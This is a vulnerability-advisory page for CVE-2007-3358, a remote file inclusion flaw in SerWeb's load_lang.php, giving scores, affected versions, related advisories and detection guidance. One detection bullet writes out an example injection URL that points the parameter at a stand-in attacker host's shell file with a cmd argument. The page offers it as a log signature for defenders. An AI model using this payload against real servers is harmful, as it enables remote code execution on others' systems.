CVE-2007-3358
published 2007-06-22CVE-2007-3358: PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in…
PriorityP354medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
68.01%
99.2th percentile
PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| iptel | serweb | <= 0.9.6 | — |
| iptel | serweb | <= 2.0.0dev1 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests to load_lang.php containing a URL (http:// or https://) in the _SERWEB[serwebdir] GET parameter, which indicates remote file inclusion exploitation. ↗
- →The exploit appends a trailing '?' and a 'cmd' parameter to the injected shell URL (e.g., ?_SERWEB[serwebdir]=http://evil/cmd.txt?&cmd=<command>), which can be used as a detection pattern in web server logs. ↗
- →The exploit is implemented as a Perl LWP::Simple HTTP client issuing GET requests; look for automated sequential requests to load_lang.php with varying cmd= values from the same source IP. ↗
- ·The vulnerability affects SerWeb 0.9.6 and earlier (including 0.9.4); the exploit targets the publicly available tarball from the iptel.org FTP server. ↗
- ·The NVD entry specifies the vulnerable file path as html/load_lang.php, while the exploit targets /load_lang.php directly — the actual web-accessible path may vary depending on deployment configuration. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3v53-3p82-fw82: Multiple PHP remote file inclusion vulnerabilities in SerWeb 2
ghsa_unreviewed·2022-05-01·CVSS 6.8
CVE-2007-6289 [MEDIUM] CWE-94 GHSA-3v53-3p82-fw82: Multiple PHP remote file inclusion vulnerabilities in SerWeb 2
Multiple PHP remote file inclusion vulnerabilities in SerWeb 2.0.0 dev1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) _SERWEB[configdir] parameter to load_lang.php, (2) _SERWEB[functionsdir] parameter to main_prepend.php, and the (3) _PHPLIB[libdir] parameter to load_phplib.php, different vectors than CVE-2007-3359 and CVE-2007-3358.
GHSA
GHSA-xv4p-rc8w-pq62: PHP remote file inclusion vulnerability in html/load_lang
ghsa_unreviewed·2022-05-01
CVE-2007-3358 [MEDIUM] GHSA-xv4p-rc8w-pq62: PHP remote file inclusion vulnerability in html/load_lang
PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/36324http://secunia.com/advisories/25680http://www.securityfocus.com/bid/24581http://www.vupen.com/english/advisories/2007/2291https://exchange.xforce.ibmcloud.com/vulnerabilities/34973https://www.exploit-db.com/exploits/4089http://osvdb.org/36324http://secunia.com/advisories/25680http://www.securityfocus.com/bid/24581http://www.vupen.com/english/advisories/2007/2291https://exchange.xforce.ibmcloud.com/vulnerabilities/34973https://www.exploit-db.com/exploits/4089
2007-06-22
Published